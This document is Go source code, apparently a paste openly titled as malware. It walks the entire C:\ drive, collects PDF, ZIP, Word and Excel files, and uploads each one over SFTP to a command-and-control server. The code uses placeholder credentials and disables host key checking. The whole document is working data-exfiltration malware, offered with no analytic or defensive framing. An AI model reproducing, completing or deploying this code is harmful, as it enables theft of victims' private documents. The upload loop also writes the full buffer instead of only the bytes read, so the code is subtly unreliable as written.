ExfilDocs (Go Malware) - Searches drive for specific file extensions + uploads files to C2 via SSH

1. /* What do I do?
2. I:
3. - Search drive for specific file extensions
4. - Upload files to C2 via SSH
5. */
6. package main
7.  
8. import (
9.     "fmt"
10.     "os"
11.     "time"
12.     "path"
13.     "log"
14.     "path/filepath"
15.     "github.com/pkg/sftp"
16.     "golang.org/x/crypto/ssh"
17.     // "strings"
18. )
19.  
20. func run() ([]string, error) {
21.     searchDir := `C:\\`
22.     fileList := make([]string, 0)
23.     e := filepath.Walk(searchDir, func(path string, f os.FileInfo, err error) error {
24.         fileList = append(fileList, path)
25.         return nil
26.     })
27.    
28.     if e != nil {
29.         fmt.Println(e)
30.         // panic(e)
31.     }
32.  
33.     for _, file := range fileList {
34.         CheckExtension(file)
35.        
36.     }
37.  
38.     return fileList, nil
39. }
40.  
41. func CheckExtension(file string){
42.     extension := filepath.Ext(file)
43.     if (extension == ".pdf") || (extension == ".zip") ||  (extension == ".doc") || (extension == ".docx") || (extension == ".xls") || (extension == ".xlsx") {
44.         fmt.Println(file)
45.         uploadfile(file)
46.         //file upload
47.     }
48. }
49.  
50.  
51. func main() {
52.     run()
53. }
54.  
55. func connect(user, password, host string, port int) (*sftp.Client, error) {
56.  var (
57.  auth   []ssh.AuthMethod
58.  addr   string
59.  clientConfig *ssh.ClientConfig
60.  sshClient *ssh.Client
61.  sftpClient *sftp.Client
62.  err   error
63.  )
64.  // get auth method
65.  auth = make([]ssh.AuthMethod, 0)
66.  auth = append(auth, ssh.Password(password))
67.  
68.  clientConfig = &ssh.ClientConfig{
69.  User: user,
70.  HostKeyCallback: ssh.InsecureIgnoreHostKey(),
71.  Auth: auth,
72.  Timeout: 30 * time.Second,
73.  }
74.  
75.  addr = fmt.Sprintf("%s:%d", host, port)
76.  
77.  if sshClient, err = ssh.Dial("tcp", addr, clientConfig); err != nil {
78.  return nil, err
79.  }
80.  if sftpClient, err = sftp.NewClient(sshClient); err != nil {
81.  return nil, err
82.  }
83.  
84.  return sftpClient, nil
85. }
86.  
87. func uploadfile(file string){
88.  var (
89.  err  error
90.  sftpClient *sftp.Client
91.  )
92.  
93.  
94.  sftpClient, err = connect("username", "password", "server", 22)
95.  if err != nil {
96.  log.Println(err)
97.  }
98.  defer sftpClient.Close()
99.  var localFilePath = file
100.  var remoteDir = "/tmp/"
101.  srcFile, err := os.Open(localFilePath)
102.  if err != nil {
103.  log.Println(err)
104.  }
105.  defer srcFile.Close()
106.  
107.  var remoteFileName = path.Base(localFilePath)
108.  dstFile, err := sftpClient.Create(path.Join(remoteDir, remoteFileName))
109.  if err != nil {
110.  log.Println(err)
111.  }
112.  defer dstFile.Close()
113.  
114.  buf := make([]byte, 1024)
115.  for {
116.  n, _ := srcFile.Read(buf)
117.  if n == 0 {
118.   break
119.  }
120.  dstFile.Write(buf)
121.  }
122.  
123.  fmt.Println("copy file to remote server finished!")
124. }